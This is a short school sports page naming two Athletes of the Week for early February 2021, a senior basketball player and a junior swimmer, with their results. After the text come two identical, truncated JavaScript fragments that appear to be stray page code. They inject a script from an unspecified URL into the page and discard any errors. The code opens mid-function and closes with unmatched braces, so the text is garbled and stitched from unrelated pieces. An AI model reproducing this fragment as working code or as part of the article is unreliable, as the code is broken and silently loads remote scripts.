Athletes of the Week
Kemba Credit Union Athletes of the Week 2/1/2021-2/7/2021
Brady Weber
Senior, Basketball
Brady played a big part in beating the Middies with a team high 25 points and 9 rebounds.
Paige Striley
Junior, Swimming
Paige won the 100 Butterfly and 100 Breaststroke at the Sectional Swimming Championships. Striley broke a sectional and pool record in the Breaststroke with the time of 1:05.01. Paige also joined the 200 freestyle team finishing up in 1st place.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();